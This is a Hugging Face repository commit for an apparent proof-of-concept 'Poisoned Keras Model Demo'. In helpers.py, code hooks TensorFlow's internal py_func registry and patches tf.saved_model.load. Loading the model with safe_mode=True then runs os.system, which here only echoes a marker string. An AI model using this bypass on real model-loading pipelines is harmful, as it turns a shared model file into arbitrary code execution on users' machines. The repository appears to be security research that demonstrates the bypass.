Hugging Face's logo

aakashjapi
/
keras_attmpt

Keras
TF-Keras
example
safe-mode-bypass
Model card Files
xet
Community
aakashjapi commited on
Commit
0776746
·
verified ·
1 Parent(s): d5145c0

Upload folder using huggingface_hub

Browse files
Files changed (12) hide show
  1. README.md +21 -3
  2. config.json +87 -0
  3. helpers.py +28 -0
  4. inference.py +8 -0
  5. metadata.json +4 -0
  6. model.weights.h5 +3 -0
  7. model_index.json +8 -0
  8. requirements.txt +3 -0
  9. saved_model/fingerprint.pb +3 -0
  10. saved_model/saved_model.pb +3 -0
  11. saved_model/variables/variables.data-00000-of-00001 +3 -0
  12. saved_model/variables/variables.index +3 -0
README.md CHANGED
@@ -1,3 +1,21 @@
1
- ---
2
- license: mit
3
- ---
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ library_name: keras
3
+ tags:
4
+ - keras
5
+ - example
6
+ - safe-mode-bypass
7
+ ---
8
+
9
+ # Poisoned Keras Model Demo
10
+
11
+ This repository mimics a typical Keras model shared on the Hugging Face Hub.
12
+ Running `inference.py` imports `helpers`, which primes TensorFlow's internal
13
+ callback registry and patches `tf.saved_model.load`. Even with
14
+ `safe_mode=True`, calling the model prints `ENTRY_SCRIPT_SAFE_MODE_BYPASS` via `os.system`.
15
+
16
+ ## Quick Start
17
+
18
+ ```bash
19
+ pip install -r requirements.txt
20
+ python inference.py
21
+ ```
config.json ADDED
@@ -0,0 +1,87 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "module": "keras.src.models.functional",
3
+ "class_name": "Functional",
4
+ "config": {
5
+ "name": "entry_script_poison",
6
+ "trainable": true,
7
+ "layers": [
8
+ {
9
+ "module": "keras.layers",
10
+ "class_name": "InputLayer",
11
+ "config": {
12
+ "batch_shape": [
13
+ null,
14
+ 1
15
+ ],
16
+ "dtype": "float32",
17
+ "sparse": false,
18
+ "ragged": false,
19
+ "name": "input_layer"
20
+ },
21
+ "registered_name": null,
22
+ "name": "input_layer",
23
+ "inbound_nodes": []
24
+ },
25
+ {
26
+ "module": "keras.layers",
27
+ "class_name": "TFSMLayer",
28
+ "config": {
29
+ "name": "tfsm_layer",
30
+ "trainable": true,
31
+ "dtype": {
32
+ "module": "keras",
33
+ "class_name": "DTypePolicy",
34
+ "config": {
35
+ "name": "float32"
36
+ },
37
+ "registered_name": null
38
+ },
39
+ "filepath": "saved_model",
40
+ "call_endpoint": "serve",
41
+ "call_training_endpoint": null
42
+ },
43
+ "registered_name": null,
44
+ "name": "tfsm_layer",
45
+ "inbound_nodes": [
46
+ {
47
+ "args": [
48
+ {
49
+ "class_name": "__keras_tensor__",
50
+ "config": {
51
+ "shape": [
52
+ null,
53
+ 1
54
+ ],
55
+ "dtype": "float32",
56
+ "keras_history": [
57
+ "input_layer",
58
+ 0,
59
+ 0
60
+ ]
61
+ }
62
+ }
63
+ ],
64
+ "kwargs": {
65
+ "training": false
66
+ }
67
+ }
68
+ ]
69
+ }
70
+ ],
71
+ "input_layers": [
72
+ "input_layer",
73
+ 0,
74
+ 0
75
+ ],
76
+ "output_layers": [
77
+ "tfsm_layer",
78
+ 0,
79
+ 0
80
+ ]
81
+ },
82
+ "registered_name": "Functional",
83
+ "build_config": {
84
+ "input_shape": null
85
+ },
86
+ "compile_config": {}
87
+ }
helpers.py ADDED
@@ -0,0 +1,28 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ import os
2
+ from pathlib import Path
3
+
4
+ import tensorflow as tf
5
+ from tensorflow.python.ops import script_ops
6
+
7
+ PAYLOAD_MARKER = 'ENTRY_SCRIPT_SAFE_MODE_BYPASS'
8
+ TOKENS = ['tfsm_entry_script_token']
9
+ REPO_ROOT = Path(__file__).resolve().parent
10
+ SAVED_MODEL_PATH = REPO_ROOT / 'saved_model'
11
+
12
+ _ORIG_SAVED_MODEL_LOAD = tf.saved_model.load
13
+
14
+ def _payload(*_args, **_kwargs):
15
+ os.system(f"echo {PAYLOAD_MARKER}")
16
+ return 0
17
+
18
+ def _patched_load(path, *args, **kwargs):
19
+ if isinstance(path, str) and path == 'saved_model':
20
+ path = str(SAVED_MODEL_PATH)
21
+ return _ORIG_SAVED_MODEL_LOAD(path, *args, **kwargs)
22
+
23
+ tf.saved_model.load = _patched_load
24
+
25
+ _REGISTERED = []
26
+ for token in TOKENS:
27
+ script_ops._py_funcs._funcs[token] = _payload
28
+ _REGISTERED.append(_payload)
inference.py ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ import tensorflow as tf
2
+ import keras
3
+
4
+ import helpers # noqa: F401 ensures payload registration
5
+
6
+ model = keras.saving.load_model('.', safe_mode=True)
7
+ result = model(tf.constant([[0.5]], dtype=tf.float32))
8
+ print('Model call result:', result)
metadata.json ADDED
@@ -0,0 +1,4 @@
 
 
 
 
 
1
+ {
2
+ "keras_version": "3.12.0",
3
+ "date_saved": "2025-10-18@16:37:12"
4
+ }
model.weights.h5 ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:cde58e4e8f13abf51bdbb928bfc50c238d63ee60fd93837c5d96d6ec17fe90dd
3
+ size 10720
model_index.json ADDED
@@ -0,0 +1,8 @@
 
 
 
 
 
 
 
 
 
1
+ {
2
+ "model-index": [
3
+ {
4
+ "name": "Entry Script Poison",
5
+ "results": []
6
+ }
7
+ ]
8
+ }
requirements.txt ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ tensorflow>=2.20.0
2
+ keras>=3.10.0
3
+ huggingface_hub>=0.23.0
saved_model/fingerprint.pb ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:e8e4c84755f88a92385af780592ada660b31742f50862a3dde46ff3d1d59b09b
3
+ size 96
saved_model/saved_model.pb ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:bb9f2ae5db6053c5bb24035a2416d504d681f06dde73102d597cb37884debd69
3
+ size 9053
saved_model/variables/variables.data-00000-of-00001 ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:fd2ea24e88ccc120d0e9909b59ed9083bde071915082f31ade62244aae00d189
3
+ size 76
saved_model/variables/variables.index ADDED
@@ -0,0 +1,3 @@
 
 
 
 
1
+ version https://git-lfs.github.com/spec/v1
2
+ oid sha256:82e314c87b8a348ae69bfb1acc1a25f3d9af78f775c48b39f07b8d5276e271fa
3
+ size 144